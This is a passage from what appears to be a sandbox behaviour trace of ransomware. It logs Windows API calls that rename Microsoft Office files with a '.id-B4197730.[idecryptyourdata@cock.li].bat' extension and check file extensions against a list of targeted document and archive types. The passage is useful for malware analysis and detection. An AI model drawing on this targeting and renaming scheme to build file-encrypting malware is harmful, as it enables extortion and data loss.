hTemplateFile=0x0) returned 0xffffffff [0174.698] CloseHandle (hObject=0x37c) returned 1 [0174.699] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.699] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.700] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01239_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01239_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.700] CloseHandle (hObject=0x37c) returned 1 [0174.701] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.701] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.701] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01240_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01240_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.701] CloseHandle (hObject=0x37c) returned 1 [0174.703] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.703] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.703] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01241_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01241_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.703] CloseHandle (hObject=0x37c) returned 1 [0174.704] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.704] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.704] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01242_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01242_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.704] CloseHandle (hObject=0x37c) returned 1 [0174.705] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.705] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.705] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01243_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01243_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.705] CloseHandle (hObject=0x37c) returned 1 [0174.706] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.706] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.706] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01244_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01244_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.706] CloseHandle (hObject=0x37c) returned 1 [0174.708] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.708] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.708] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01245_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01245_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.710] CloseHandle (hObject=0x37c) returned 1 [0174.711] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.711] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.711] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01246_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01246_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.711] CloseHandle (hObject=0x37c) returned 1 [0174.712] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.712] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01253_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01253_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.713] CloseHandle (hObject=0x37c) returned 1 [0174.713] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.714] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.714] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01268_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01268_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.714] CloseHandle (hObject=0x37c) returned 1 [0174.719] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.719] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.719] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01292_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01292_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.719] CloseHandle (hObject=0x37c) returned 1 [0174.721] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.721] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.721] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01293_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01293_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.721] CloseHandle (hObject=0x37c) returned 1 [0174.722] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.722] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.722] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01294_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01294_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.722] CloseHandle (hObject=0x37c) returned 1 [0174.723] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.723] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.724] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01295_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01295_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.724] CloseHandle (hObject=0x37c) returned 1 [0174.725] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.726] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.726] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01296_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01296_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.726] CloseHandle (hObject=0x37c) returned 1 [0174.727] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.727] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.727] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01297_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01297_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.727] CloseHandle (hObject=0x37c) returned 1 [0174.729] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.729] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.729] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01298_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01298_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.729] CloseHandle (hObject=0x37c) returned 1 [0174.730] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.730] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.730] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01299_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01299_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.731] CloseHandle (hObject=0x37c) returned 1 [0174.731] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.731] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.731] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01300_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01300_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.732] CloseHandle (hObject=0x37c) returned 1 [0174.732] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.733] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.733] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01301_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01301_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.733] CloseHandle (hObject=0x37c) returned 1 [0174.734] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.734] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.735] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01304G.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01304g.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.735] CloseHandle (hObject=0x37c) returned 1 [0174.736] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.736] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.736] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01330_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01330_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.736] CloseHandle (hObject=0x37c) returned 1 [0175.029] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0175.029] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0175.029] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01734_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01734_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.029] CloseHandle (hObject=0x530) returned 1 [0175.029] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Ion.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\ion.thmx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Ion.thmx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\ion.thmx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0175.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Ion.thmx") returned 66 [0175.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Ion.thmx") returned 66 [0175.030] lstrlenW (lpString=".doc") returned 4 [0175.030] lstrcmpiW (lpString1=".doc", lpString2="thmx") returned -1 [0175.030] lstrlenW (lpString=".docx") returned 5 [0175.030] lstrcmpiW (lpString1=".docx", lpString2=".thmx") returned -1 [0175.030] lstrlenW (lpString=".pdf") returned 4 [0175.030] lstrcmpiW (lpString1=".pdf", lpString2="thmx") returned -1 [0175.030] lstrlenW (lpString=".xls") returned 4 [0175.030] lstrcmpiW (lpString1=".xls", lpString2="thmx") returned -1 [0175.030] lstrlenW (lpString=".xlsx") returned 5 [0175.030] lstrcmpiW (lpString1=".xlsx", lpString2=".thmx") returned 1 [0175.030] lstrlenW (lpString=".ppt") returned 4 [0175.030] lstrcmpiW (lpString1=".ppt", lpString2="thmx") returned -1 [0175.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Ion.thmx") returned 66 [0175.030] lstrlenW (lpString=".zip") returned 4 [0175.030] lstrcmpiW (lpString1=".zip", lpString2="thmx") returned -1 [0175.030] lstrlenW (lpString=".rar") returned 4 [0175.030] lstrcmpiW (lpString1=".rar", lpString2="thmx") returned -1 [0175.030] lstrlenW (lpString=".bz2") returned 4 [0175.030] lstrcmpiW (lpString1=".bz2", lpString2="thmx") returned -1 [0175.030] lstrlenW (lpString=".7z") returned 3 [0175.030] lstrcmpiW (lpString1=".7z", lpString2="hmx") returned -1 [0175.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Ion.thmx") returned 66 [0175.031] lstrlenW (lpString=".dbf") returned 4 [0175.031] lstrcmpiW (lpString1=".dbf", lpString2="thmx") returned -1 [0175.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Ion.thmx") returned 66 [0175.031] lstrlenW (lpString=".1cd") returned 4 [0175.031] lstrcmpiW (lpString1=".1cd", lpString2="thmx") returned -1 [0175.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Ion.thmx") returned 66 [0175.031] lstrlenW (lpString=".jpg") returned 4 [0175.031] lstrcmpiW (lpString1=".jpg", lpString2="thmx") returned -1 [0175.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Ion.thmx") returned 66 [0175.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Ion.thmx") returned 66 [0175.031] lstrlenW (lpString=".doc") returned 4 [0175.031] lstrcmpiW (lpString1=".doc", lpString2="thmx") returned -1 [0175.031] lstrlenW (lpString=".docx") returned 5 [0175.031] lstrcmpiW (lpString1=".docx", lpString2=".thmx") returned -1 [0175.031] lstrlenW (lpString=".pdf") returned 4 [0175.031] lstrcmpiW (lpString1=".pdf", lpString2="thmx") returned -1 [0175.031] lstrlenW (lpString=".xls") returned 4 [0175.031] lstrcmpiW (lpString1=".xls", lpString2="thmx") returned -1 [0175.031] lstrlenW (lpString=".xlsx") returned 5 [0175.031] lstrcmpiW (lpString1=".xlsx", lpString2=".thmx") returned 1 [0175.031] lstrlenW (lpString=".ppt") returned 4 [0175.031] lstrcmpiW (lpString1=".ppt", lpString2="thmx") returned -1 [0175.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Ion.thmx") returned 66 [0175.032] lstrlenW (lpString=".zip") returned 4 [0175.032] lstrcmpiW (lpString1=".zip", lpString2="thmx") returned -1 [0175.032] lstrlenW (lpString=".rar") returned 4 [0175.032] lstrcmpiW (lpString1=".rar", lpString2="thmx") returned -1 [0175.032] lstrlenW (lpString=".bz2") returned 4 [0175.032] lstrcmpiW (lpString1=".bz2", lpString2="thmx") returned -1 [0175.032] lstrlenW (lpString=".7z") returned 3 [0175.032] lstrcmpiW (lpString1=".7z", lpString2="hmx") returned -1 [0175.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Ion.thmx") returned 66 [0175.032] lstrlenW (lpString=".dbf") returned 4 [0175.032] lstrcmpiW (lpString1=".dbf", lpString2="thmx") returned -1 [0175.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Ion.thmx") returned 66 [0175.032] lstrlenW (lpString=".1cd") returned 4 [0175.032] lstrcmpiW (lpString1=".1cd", lpString2="thmx") returned -1 [0175.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Ion.thmx") returned 66 [0175.032] lstrlenW (lpString=".jpg") returned 4 [0175.032] lstrcmpiW (lpString1=".jpg", lpString2="thmx") returned -1 [0175.032] lstrcmpiW (lpString1=".thmx", lpString2=".bat") returned 1 [0175.032] lstrlenW (lpString="Office Theme.thmx") returned 17 [0175.033] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Office Theme.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\office theme.thmx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0175.033] GetFileSizeEx (in: hFile=0x530, lpFileSize=0x39fff14 | out: lpFileSize=0x39fff14*=326027) returned 1 [0175.033] CloseHandle (hObject=0x530) returned 1 [0175.033] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Office Theme.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\office theme.thmx")) returned 0x220 [0175.034] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Office Theme.thmx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\office theme.thmx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0175.163] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Office Theme.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\office theme.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0175.165] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0175.165] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0175.166] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Office Theme.thmx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\office theme.thmx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.166] CloseHandle (hObject=0x530) returned 1 [0175.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Office Theme.thmx") returned 75 [0175.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Office Theme.thmx") returned 75 [0175.166] lstrlenW (lpString=".doc") returned 4 [0175.167] lstrcmpiW (lpString1=".doc", lpString2="thmx") returned -1 [0175.167] lstrlenW (lpString=".docx") returned 5 